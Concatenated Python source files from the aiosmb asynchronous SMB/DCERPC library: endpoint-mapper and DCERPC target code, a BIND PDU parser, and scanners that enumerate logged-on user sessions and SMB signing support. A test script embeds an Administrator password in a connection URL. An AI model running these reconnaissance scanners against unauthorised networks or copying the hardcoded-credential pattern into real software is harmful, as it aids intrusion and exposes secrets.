		if self.smb_connection is not None:
			return self.smb_connection.target.get_ip_or_hostname()
		if self.ip is None:
			return self.hostname
		return self.ip
	
	#def to_target_string(self) -> str:
	#	if self.hostname is None:
	#		raise Exception('Hostname is None!')
	#	if self.domain is None:
	#		raise Exception('Domain is None!')
	#	return 'cifs/%s@%s' % (self.hostname, self.domain)

	def to_target_string(self) -> str:
		if self.smb_connection is not None:
			return self.smb_connection.target.to_target_string()
		return 'cifs/%s@%s' % (self.hostname, self.domain)

	@staticmethod
	def from_smbconnection(smb_connection, pipe = None):
		if pipe is None:
			target = DCERPCSMBTarget(None, smb_connection.target.get_ip_or_hostname(), smb_connection=smb_connection, timeout = smb_connection.target.timeout, hostname=smb_connection.target.get_hostname_or_ip())
		else:
			target = DCERPCSMBTarget(None, smb_connection.target.get_ip_or_hostname(), pipe, smb_connection=smb_connection, timeout = smb_connection.target.timeout, hostname=smb_connection.target.get_hostname_or_ip())
		return target

	@staticmethod
	def from_connection_string(s, smb_connection = None, timeout = 1, proxies:List[UniProxyTarget] = None, dc_ip:str = None, domain:str = None, hostname:str = None):
		if isinstance(s, str):
			connection_string = DCERPCStringBinding(s)
		elif isinstance(s, DCERPCStringBinding):
			connection_string = s
		else:
			raise Exception('Unknown string binding type %s' % type(s))
		
		if domain is None and smb_connection is not None:
			domain = smb_connection.target.domain

		na = connection_string.get_network_address()
		ps = connection_string.get_protocol_sequence()
		if ps == 'ncadg_ip_udp':
			raise Exception('DCERPC UDP not implemented')
			port = connection_string.get_endpoint()
			target = DCERPCUDPTarget(connection_string, na, int(port), timeout = timeout)
		elif ps == 'ncacn_ip_tcp':
			port = connection_string.get_endpoint()
			target = DCERPCTCPTarget(connection_string, na, port, timeout = timeout, dc_ip=dc_ip, domain = domain, hostname = hostname)
		elif ps == 'ncacn_http':
			raise Exception('DCERPC HTTP not implemented')
			target = DCERPCHTTPTarget(connection_string, na, int(port), timeout = timeout)
		elif ps == 'ncacn_np':
			named_pipe = connection_string.get_endpoint()
			if named_pipe:
				named_pipe = named_pipe[len(r'\pipe'):]
				target = DCERPCSMBTarget(connection_string, na, pipe=named_pipe, smb_connection=smb_connection, timeout = timeout, hostname = hostname)
			else:
				target = DCERPCSMBTarget(connection_string, na, smb_connection=smb_connection, timeout = timeout, hostname = hostname)
		elif ps == 'ncalocal':
			raise Exception('DCERPC LOCAL not implemented')
			target = DCERPCLocalTarget(connection_string, na, int(port), timeout = timeout)
		
		else:
			raise Exception('Unknown DCERPC protocol %s' % ps)

		if proxies is not None:
			target.proxies = copy.deepcopy(proxies)


		if smb_connection is not None:
			if smb_connection.target.proxies is not None:
				target.proxies = copy.deepcopy(smb_connection.target.proxies)
			
		return target

	def __str__(self):
		t = '==== DCERPCTarget ====\r\n'
		for k in self.__dict__:
			t += '%s: %s\r\n' % (k, self.__dict__[k])
			
		return t

	def __hash__(self):
		return hash(str(self.connection_string) + str(self.rpcprotocol) + str(self.pipe) +\
			str(self.ip) + str(self.port) + str(self.protocol) + str(self.timeout) +\
			str(self.hostname) + str(self.domain) + str(self.dc_ip))

	def __eq__(self, other):
		if not isinstance(other, DCERPCTarget):
			return False
		return self.__hash__() == other.__hash__()

class DCERPCTCPTarget(DCERPCTarget):
	def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, dc_ip:str = None, domain:str = None, hostname = None):
		DCERPCTarget.__init__(
			self, 
			connection_string, 
			ip, 
			int(port), 
			UniProto.CLIENT_TCP, 
			'ncacn_ip_tcp', 
			proxies = proxies, 
			timeout = timeout, 
			hostname = hostname, 
			domain = domain, 
			dc_ip = dc_ip
		)

class DCERPCUDPTarget(DCERPCTarget):
	def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, dc_ip:str = None, domain:str = None, hostname = None):
		DCERPCTarget.__init__(
			self, 
			connection_string, 
			ip, 
			int(port), 
			UniProto.CLIENT_UDP, 
			'ncadg_ip_udp', 
			proxies = proxies, 
			timeout = timeout, 
			hostname = hostname, 
			domain = domain, 
			dc_ip = dc_ip
		)

class DCERPCSMBTarget(DCERPCTarget):
	def __init__(self, connection_string, ip, pipe = None, smb_connection = None, timeout = 1, hostname = None):
		DCERPCTarget.__init__(
			self, 
			connection_string, 
			ip, 
			None, 
			UniProto.CLIENT_TCP, 
			'ncacn_np', 
			proxies = smb_connection.target.proxies, 
			timeout = timeout, 
			hostname = hostname, 
			domain = smb_connection.target.domain, 
			dc_ip = smb_connection.target.dc_ip,
			smb_connection = smb_connection,
			pipe = pipe
		)

class DCERPCHTTPTarget(DCERPCTarget):
	def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, domain = None, dc_ip = None, hostname = None):
		DCERPCTarget.__init__(
			self,
			connection_string,
			ip,
			port, 
			UniProto.CLIENT_TCP,
			'ncacn_http',
			proxies = proxies, 
			timeout = timeout, 
			hostname = hostname, 
			domain = domain, 
			dc_ip = dc_ip
		)
		self.set_hostname_or_ip(ip)
		self.port = int(port)

class DCERPCLocalTarget(DCERPCTarget):
	def __init__(self, connection_string, ip, port, timeout = 1, hostname = None):
		raise NotImplementedError()
		DCERPCTarget.__init__(self, connection_string, DCERPCTargetType.LOCAL, timeout = timeout)
		self.set_hostname_or_ip(ip)
		self.port = int(port)
		self.rpcprotocol = 'ncalocal'



if __name__ == '__main__':
	s = ''
	target = DCERPCTarget.from_connection_string(s)
	





import traceback
from typing import List
from aiosmb.dcerpc.v5.epm import *
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5.common.connection.target import DCERPCTarget
from aiosmb.dcerpc.v5.common.connection.authentication import DCERPCAuth
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY
from asysocks.unicomm.common.proxy import UniProxyTarget
from asysocks.unicomm.common.target import UniTarget

from asyauth.common.credentials.spnego import SPNEGOCredential
from asyauth.common.credentials.ntlm import NTLMCredential
from asyauth.common.credentials.kerberos import KerberosCredential

"""
EPM is a bit special interface, as it seems it doesn't require authentication?
So it should have been easy to just create a static method to resolv endpoints.
However there is a bit of a problem whan you want to use it with proxyies,
hence an interface needed to be created that takes the proxy settings into account
"""
class EPM:
	def __init__(self, connection:DCERPC5Connection, data_representation:bytes = None):
		self.dce = connection
		self.data_representation = data_representation
		if data_representation is None:
			self.data_representation = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))

	@staticmethod
	def from_address(ip, port:int = 135, protocol:str = 'ncacn_ip_tcp', data_representation = None, proxies:List[UniProxyTarget] = None):
		"""
		Sets up the EPM object from IP/hostname port protocol parameters
		"""
		dcerpc_target_str = r'%s:%s[%s]' % (protocol, ip, port)
		target = DCERPCTarget.from_connection_string(dcerpc_target_str, proxies = proxies)
		auth = None
		connection = DCERPC5Connection(auth, target)
		connection.set_auth_type(RPC_C_AUTHN_LEVEL_NONE)
		return EPM(connection, data_representation)

	@staticmethod
	def from_smbconnection(smb_connection, port:int = 135, protocol:str = 'ncacn_ip_tcp', data_representation = None):
		"""
		Sets up the EPM connection from an existing SMB connection
		"""
		dcerpc_target_str = r'%s:%s[%s]' % (protocol, smb_connection.target.get_ip_or_hostname(), port)
		target = DCERPCTarget.from_connection_string(dcerpc_target_str, proxies=smb_connection.target.proxies)
		auth = DCERPCAuth.from_smb_gssapi(smb_connection.gssapi)
		connection = DCERPC5Connection(auth, target)
		connection.set_auth_type(RPC_C_AUTHN_LEVEL_NONE)
		return EPM(connection, data_representation)

	@staticmethod
	def from_unitarget(target:UniTarget, protocol:str = 'ncacn_ip_tcp', port:int = 135, data_representation = None, credentials = None):
		dcerpc_target_str = r'%s:%s[%s]' % (protocol, target.get_ip_or_hostname(), port)
		target = DCERPCTarget.from_connection_string(dcerpc_target_str, proxies = target.proxies)
		auth = None
		if credentials is not None:
			auth = DCERPCAuth.from_smb_gssapi(credentials)
		connection = DCERPC5Connection(auth, target)
		if auth is None:
			connection.set_auth_type(RPC_C_AUTHN_LEVEL_NONE)
		return EPM(connection, data_representation)

	@staticmethod
	async def create_connection(target:UniTarget, credential:SPNEGOCredential, remoteIf):
		epm = None
		try:
			epm = EPM.from_unitarget(target)
			_, err = await epm.connect()
			if err is not None:
				raise err

			res, err = await epm.map(remoteIf)
			if err is not None:
				raise err
			
			dcetarget = DCERPCTarget.from_connection_string(res, proxies = target.proxies, dc_ip = target.dc_ip, domain = target.domain)
			dcecred = DCERPCAuth.from_smb_gssapi(credential)
			return DCERPC5Connection(dcecred, dcetarget), None

		except Exception as e:
			return False, e
		finally:
			if epm is not None:
				await epm.disconnect()

	@staticmethod
	async def create_target(ip, remoteIf, proxies:List[UniProxyTarget] = None, dc_ip:str = None, domain:str = None):
		epm = None
		try:
			epm = EPM.from_address(ip, proxies = proxies)
			_, err = await epm.connect()
			if err is not None:
				raise err

			res, err = await epm.map(remoteIf)
			if err is not None:
				raise err
			
			return DCERPCTarget.from_connection_string(res, proxies = proxies, dc_ip = dc_ip, domain = domain), None
		except Exception as e:
			return False, e
		finally:
			if epm is not None:
				await epm.disconnect()

	async def disconnect(self):
		await self.dce.disconnect()

	async def connect(self, autobind = True):
		try:
			_, err = await self.dce.connect()
			if err is not None:
				raise err
			
			if not autobind:
				return True, None
			return await self.bind()
		except Exception as e:
			return False, e
	
	async def bind(self, uuid = MSRPC_UUID_PORTMAP):
		try:
			_, err = await self.dce.bind(uuid)
			if err is not None:
				raise err
			return True,None
		except Exception as e:
			return False, e

	async def disconnect(self):
		await self.dce.disconnect()
	
	async def request(self, request):
		try:
			return await self.dce.request(request)
		except Exception as e:
			return None, e

	async def map(self, remoteIf):
		try:
			tower = EPMTower()
			interface = EPMRPCInterface()

			interface['InterfaceUUID'] = remoteIf[:16]
			interface['MajorVersion'] = unpack('<H', remoteIf[16:][:2])[0]
			interface['MinorVersion'] = unpack('<H', remoteIf[18:])[0]

			dataRep = EPMRPCDataRepresentation()
			dataRep['DataRepUuid'] = self.data_representation[:16]
			dataRep['MajorVersion'] = unpack('<H', self.data_representation[16:][:2])[0]
			dataRep['MinorVersion'] = unpack('<H', self.data_representation[18:])[0]

			protId = EPMProtocolIdentifier()
			protId['ProtIdentifier'] = FLOOR_RPCV5_IDENTIFIER

			if self.dce.target.rpcprotocol == 'ncacn_np':
				pipeName = EPMPipeName()
				pipeName['PipeName'] = b'\x00'

				hostName = EPMHostName()
				hostName['HostName'] = b('%s\x00' % self.dce.target.ip)
				transportData = pipeName.getData() + hostName.getData()

			elif self.dce.target.rpcprotocol == 'ncacn_ip_tcp':
				portAddr = EPMPortAddr()
				portAddr['IpPort'] = 0

				hostAddr = EPMHostAddr()
				hostAddr['Ip4addr'] = b'\x00\x00\x00\x00' #socket.inet_aton('0.0.0.0')
				transportData = portAddr.getData() + hostAddr.getData()
			elif self.dce.target.rpcprotocol == 'ncacn_http':
				portAddr = EPMPortAddr()
				portAddr['PortIdentifier'] = FLOOR_HTTP_IDENTIFIER
				portAddr['IpPort'] = 0

				hostAddr = EPMHostAddr()
				hostAddr['Ip4addr'] = b'\x00\x00\x00\x00' #socket.inet_aton('0.0.0.0')
				transportData = portAddr.getData() + hostAddr.getData()

			else:
				raise Exception('Unsupported protocol! %s' % self.protocol)

			tower['NumberOfFloors'] = 5
			tower['Floors'] = interface.getData() + dataRep.getData() + protId.getData() + transportData

			request = ept_map()
			request['max_towers'] = 1
			request['map_tower']['tower_length'] = len(tower)
			request['map_tower']['tower_octet_string'] = tower.getData()

			# Under Windows 2003 the Referent IDs cannot be random
			# they must have the following specific values
			# otherwise we get a rpc_x_bad_stub_data exception
			request.fields['obj'].fields['ReferentID'] = 1
			request.fields['map_tower'].fields['ReferentID'] = 2

			resp, err = await self.dce.request(request)
			if err is not None:
				raise err

			tower = EPMTower(b''.join(resp['ITowers'][0]['Data']['tower_octet_string']))
			# Now let's parse the result and return an stringBinding
			result = None
			if self.dce.target.rpcprotocol == 'ncacn_np':
				# Pipe Name should be the 4th floor
				pipeName = EPMPipeName(tower['Floors'][3].getData())
				result = 'ncacn_np:%s[%s]' % (self.dce.target.get_hostname_or_ip(), pipeName['PipeName'].decode('utf-8')[:-1])
			elif self.dce.target.rpcprotocol == 'ncacn_ip_tcp':
				# Port Number should be the 4th floor
				portAddr = EPMPortAddr(tower['Floors'][3].getData())
				result = 'ncacn_ip_tcp:%s[%s]' % (self.dce.target.get_hostname_or_ip(), portAddr['IpPort'])
			elif self.dce.target.rpcprotocol == 'ncacn_http':
				# Port Number should be the 4th floor
				portAddr = EPMPortAddr(tower['Floors'][3].getData())
				result = 'ncacn_http:%s[%s]' % (self.dce.target.get_hostname_or_ip(), portAddr['IpPort'])
			
			return result, None
		except Exception as e:
			return None, e

	
	async def lookup(self, inquiry_type = RPC_C_EP_ALL_ELTS, objectUUID = NULL, ifId = NULL, vers_option = RPC_C_VERS_ALL,  entry_handle = ept_lookup_handle_t(), max_ents = 499):
		try:
			request = ept_lookup()
			request['inquiry_type'] = inquiry_type
			request['object'] = objectUUID
			if ifId != NULL:
				request['Ifid']['Uuid'] = ifId[:16]
				request['Ifid']['VersMajor'] = ifId[16:][:2]
				request['Ifid']['VersMinor'] = ifId[18:]
			else:
				request['Ifid'] = ifId
			request['vers_option'] = vers_option
			request['entry_handle'] = entry_handle
			request['max_ents'] = max_ents
			
			resp, err = await self.dce.request(request)
			if err is not None:
				raise err

			entries = []
			for i in range(resp['num_ents']):
				tmpEntry = {}
				entry = resp['entries'][i]
				tmpEntry['object'] = entry['object'] 
				tmpEntry['annotation'] = b''.join(entry['annotation'])
				tmpEntry['tower'] = EPMTower(b''.join(entry['tower']['tower_octet_string']))
				entries.append(tmpEntry)

			return entries, None
		except Exception as e:
			return None, e

async def amain():
	try:
		from aiosmb.dcerpc.v5 import nrpc
		epm = EPM.from_address('10.10.10.2')
		_, err = await epm.connect()
		if err is not None:
			raise err
		
		res, err = await epm.lookup()
		if err is not None:
			raise err
		print(res)
		print()
		res, err = await epm.map(nrpc.MSRPC_UUID_NRPC)
		if err is not None:
			raise err
		print(res)


	except Exception as e:
		traceback.print_exc()

if __name__ == '__main__':
	import asyncio
	asyncio.run(amain())
	



from asysocks.unicomm.common.scanner.common import *
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine


class SMBSessionRes:
	def __init__(self, session):
		self.session = session

	def get_header(self):
		return ['USERNAME','IP']

	def to_line(self, separator = '\t'):
		return separator.join([str(self.session.username), str(self.session.ip_addr)])

class SMBSessionScanner:
	def __init__(self, factory:SMBConnectionFactory):
		self.factory:SMBConnectionFactory = factory

	async def run(self, targetid, target, out_queue):
		try:
			connection = self.factory.create_connection_newtarget(target)
			async with connection:
				_, err = await connection.login()
				if err is not None:
					raise err
				
				machine = SMBMachine(connection)
				async for session, err in machine.list_sessions():
					# SMBUserSession
					if err is not None:
						raise err
					await out_queue.put(ScannerData(target, SMBSessionRes(session)))

		except Exception as e:
			await out_queue.put(ScannerError(target, e))




from asysocks.unicomm.common.packetizers import Packetizer

class NetBIOSPacketizer(Packetizer):
	def __init__(self, buffer_size = 65535):
		Packetizer.__init__(self, buffer_size)
		self.in_buffer = b''
		self.__total_size = -1
	
	def process_buffer(self):
		if self.__total_size == -1:
			if len(self.in_buffer) > 5:
				self.__total_size = int.from_bytes(self.in_buffer[1:4], byteorder='big', signed = False) + 4

		while self.__total_size > -1 and len(self.in_buffer) >= self.__total_size:
			if self.__total_size > -1 and len(self.in_buffer) >= self.__total_size:
				msg_data = self.in_buffer[:self.__total_size][4:]
				self.in_buffer = self.in_buffer[self.__total_size:]
				self.__total_size = -1
				if len(self.in_buffer) > 5:
					self.__total_size = int.from_bytes(self.in_buffer[1:4], byteorder='big', signed = False) + 4
						
				#print('%s nbmsg! ' % (self.network_transport.writer.get_extra_info('peername')[0], ))
				#print('[NetBIOS] MSG dispatched')
				yield msg_data

	async def data_out(self, smb_msg_data):
		if smb_msg_data is None:
			return
		data  = b'\x00'
		data += len(smb_msg_data).to_bytes(3, byteorder='big', signed = False)
		data += smb_msg_data
		yield data

	async def data_in(self, data):
		if data is None:
			for packet in self.process_buffer():
				yield packet
		else:
			self.in_buffer += data
			for packet in self.process_buffer():
				yield packet

		#if data is None:
		#	yield data
		#self.in_buffer += data
		#for packet in self.process_buffer():
		#	yield packet
		
		



from setuptools import setup, find_packages
import re

VERSIONFILE="aiosmb/_version.py"
verstrline = open(VERSIONFILE, "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
    verstr = mo.group(1)
else:
    raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))

setup(
	# Application name:
	name="aiosmb",

	# Version number (initial):
	version=verstr,

	# Application author details:
	author="Tamas Jos",
	author_email="info@skelsecprojects.com",

	# Packages
	packages=find_packages(exclude=["tests*"]),

	# Include additional files into the package
	include_package_data=True,


	# Details
	url="https://github.com/skelsec/aiosmb",

	zip_safe = False,
	#
	# license="LICENSE.txt",
	description="Asynchronous SMB protocol implementation",

	# long_description=open("README.txt").read(),
	python_requires='>=3.7',
	install_requires=[
		'unicrypto>=0.0.10',
		'asyauth>=0.0.16',
		'asysocks>=0.2.9',
		'prompt-toolkit>=3.0.2',
		'winacl>=0.1.7',
		'six',
		'tqdm',
		'colorama',
		'asn1crypto',
		'wcwidth',
	],
	
	classifiers=[
		"Programming Language :: Python :: 3.7",
		"License :: OSI Approved :: MIT License",
		"Operating System :: OS Independent",
	],
	entry_points={
		'console_scripts': [
			'asmbclient = aiosmb.examples.smbclient:main',
			'asmbshareenum = aiosmb.examples.smbshareenum:main',
			'asmbgetfile = aiosmb.examples.smbgetfile:main',
			'asmbcertreq = aiosmb.examples.smbcertreq:main',
			'asmbscanner = aiosmb.examples.scanners.__main__:main'
		],

	}
)



import asyncio
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine

async def test(url_str):

	url = SMBConnectionFactory.from_url(url_str)
	connection = url.get_connection()
	_, err = await connection.login()
	if err is not None:
		print(err)
		raise err
	machine = SMBMachine(connection)
	async for share, err in  machine.list_shares():
		if err is not None:
			print(err)
			raise err
		
		print(share)

	


if __name__ == '__main__':
	url = 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.2'
	asyncio.run(test(url))


import io
import uuid
from aiosmb.dcerpc.v5.protocol.con.constants import PTYPE, PFC
from aiosmb.dcerpc.v5.protocol.con.commons import PresentationSyntax

class Context_Elem_T:
	def __init__(self):
		self.p_cont_id = None
		self.n_transfer_syn = None
		self.reserved = None
		self.abstract_syntax = None
		self.transfer_syntaxes = []
	
	@staticmethod
	def from_bytes(data):
		return Context_Elem_T.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = Context_Elem_T()
		res.p_cont_id = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.n_transfer_syn  = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.reserved = buff.read(1)
		res.abstract_syntax = PresentationSyntax.from_buffer(buff)
		for _ in range(res.n_transfer_syn):
			res.transfer_syntaxes.append(PresentationSyntax.from_buffer(buff))
		return res
	
	def __str__(self):
		t = "Context_Elem_T\r\n"
		t += 'abstract_syntax: %s' % self.abstract_syntax
		for entry, i in enumerate(self.transfer_syntaxes):
			t += '%s : %s' % (i, entry)
		return t
	
	def __repr__(self):
		return self.__str__()
	
class Context_List_T:
	def __init__(self):
		self.n_context_elem = None
		self.reserved = None
		self.reserved2 = None
		self.results = []
	
	@staticmethod
	def from_bytes(data):
		return Context_List_T.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = Context_List_T()
		res.n_context_elem = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.reserved  = buff.read(1)
		res.reserved2 = buff.read(2)
		for _ in range(res.n_context_elem):
			res.results.append(Context_Elem_T.from_buffer(buff))
		return res
	
	def __str__(self):
		t = "Context_List_T\r\n"
		for entry, i in enumerate(self.results):
			t += '%s : %s' % (i, entry)
		return t
	
	def __repr__(self):
		return self.__str__()


class BINDPDU:
	def __init__(self) -> None:
		self.rpc_vers = 5
		self.rpc_vers_minor = 0
		self.PTYPE = PTYPE.BIND
		self.pfc_flags = None
		self.packed_drep = None
		self.frag_length = None
		self.auth_length = None
		self.call_id = None

		self.max_xmit_frag = None
		self.max_recv_frag = None
		self.assoc_group_id = None
		self.context_list = None #p_cont_list_t p_context_elem; /* variable size */

		self.auth_verifier = None #auth_verifier_co_t
	
	@staticmethod
	def from_bytes(data):
		return BINDPDU.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = BINDPDU()
		res.rpc_vers = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.rpc_vers_minor = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.PTYPE = PTYPE(int.from_bytes(buff.read(1), byteorder='little', signed=False))
		res.pfc_flags = PFC(int.from_bytes(buff.read(1), byteorder='little', signed=False))
		res.packed_drep = buff.read(4)
		res.frag_length = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.auth_length = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.call_id = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		res.max_xmit_frag = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.max_recv_frag = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.assoc_group_id = buff.read(4)
		res.context_list = Context_List_T.from_buffer(buff)
		
		if res.auth_length > 0:
			res.auth_verifier = buff.read(res.auth_length)
		return res
	
	def __str__(self):
		t = 'BINDPDU\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for entry, i in enumerate(self.__dict__[k]):
					print(entry)
					t += '%s : %s : %s\r\n' % (k, i, str(entry))
			else:
				t += '%s : %s\r\n' % (k, self.__dict__[k])
		return t

if __name__ == '__main__':
	data = bytes.fromhex('05000b03100000004800000001000000b810b810000000000100000000000100c84f324b7016d30112785a47bf6ee18803000000045d888aeb1cc9119fe808002b10486002000000')
	x = BINDPDU.from_bytes(data)
	print(str(x))


import enum


class PTYPE(enum.Enum):
	REQUEST   = 0x00
	PING	  = 0x01
	RESPONSE  = 0x02
	FAULT	 = 0x03
	WORKING   = 0x04
	NOCALL	= 0x05
	REJECT	= 0x06
	ACK	   = 0x07
	CL_CANCEL = 0x08
	FACK	  = 0x09
	CANCELACK = 0x0A
	BIND	  = 0x0B
	BINDACK   = 0x0C
	BINDNAK   = 0x0D
	ALTERCTX  = 0x0E
	ALTERCTX_R= 0x0F
	AUTH3	 = 0x10
	SHUTDOWN  = 0x11
	CO_CANCEL = 0x12
	ORPHANED  = 0x13

class PFC(enum.IntFlag):
	FIRST_FRAG = 0x01
	LAST_FRAG = 0x02
	PENDING_CANCEL = 0x04
	RESERVED_1 = 0x08
	CONC_MPX = 0x10
	DID_NOT_EXECUTE = 0x20
	MAYBE = 0x40
	OBJECT_UUID = 0x80



from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.dcerpc.v5 import wkst
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
from aiosmb.wintypes.ntstatus import NTStatus
from aiosmb import logger
from aiosmb.dcerpc.v5.dtypes import NULL
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE

		
class WKSTRPC:
	def __init__(self):
		self.service_pipename = r'\wkssvc'
		self.service_uuid = wkst.MSRPC_UUID_WKST
		self.dce = None
		self.handle = None
		
		#self.policy_handles = {} #handle to sid
		#self.ph_ctr = 0
		
	async def __aenter__(self):
		return self
	
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True, None
	
	async def close(self):		
		try:
			if self.dce:
				try:
					await self.dce.disconnect()
				except:
					pass
				return True, None
		except Exception as e:
			return None, e
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = WKSTRPC()
			service.dce = connection
			
			#service.dce.set_auth_level(auth_level)
			#if auth_level is None:
			#	service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(WKSTRPC().service_uuid)
			if err is not None:
				raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			rpctransport = SMBDCEFactory(connection, filename=WKSTRPC().service_pipename)		
			service, err = await WKSTRPC.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e
	
	async def list_sessions(self, level=0):
		try:
			if level not in [0,1]:
				raise Exception('Level must be 0 or 1!')
			resp, err = await wkst.hNetrWkstaUserEnum(self.dce, level, preferredMaximumLength=0xffffffff)
			if err is not None:
				raise err
			
			if level == 0:
				for session in resp['UserInfo']['WkstaUserInfo']['Level0']['Buffer']:
					username = session['wkui0_username'][:-1]
					yield username, '', None

			elif level == 1:
				for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
					username = session['wkui1_username'][:-1]
					domain = session['wkui1_logon_domain'][:-1]
					#session['wkui1_logon_server'][:-1]
					#session['wkui1_oth_domains'][:-1]
					yield '%s\\%s' % (domain, username), '', None

		except Exception as e:
			yield None, None, e



from asysocks.unicomm.common.scanner.common import *
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine
from aiosmb.protocol.common import SMB_NEGOTIATE_PROTOCOL_TEST, NegotiateDialects

class SMBProtocolRes:
	def __init__(self, protores, sign_en, sign_req):
		self.protores = protores.replace('WILDCARD', 'SMB1')
		self.signing_enabled = sign_en
		self.signing_required = sign_req

	def get_header(self):
		return ['PROTO', 'SIGN_ENABLED', 'SIGN_ENFORCED']

	def to_line(self, separator = '\t'):
		return separator.join([str(self.protores), str(self.signing_enabled), str(self.signing_required)])

class SMBProtocolScanner:
	def __init__(self, factory:SMBConnectionFactory):
		self.factory:SMBConnectionFactory = factory
		self.protocols = SMB_NEGOTIATE_PROTOCOL_TEST

	async def run(self, targetid, target, out_queue):
		try:
			for protocol in self.protocols:
				connection = self.factory.create_connection_newtarget(target)
				res, sign_en, sign_req, rply, err = await connection.protocol_test([protocol])
				if err is not None:
					raise err
				
				if res is True:
					await out_queue.put(ScannerData(target, SMBProtocolRes(protocol.name, sign_en, sign_req)))
				
		except Exception as e:
			await out_queue.put(ScannerError(target, e))
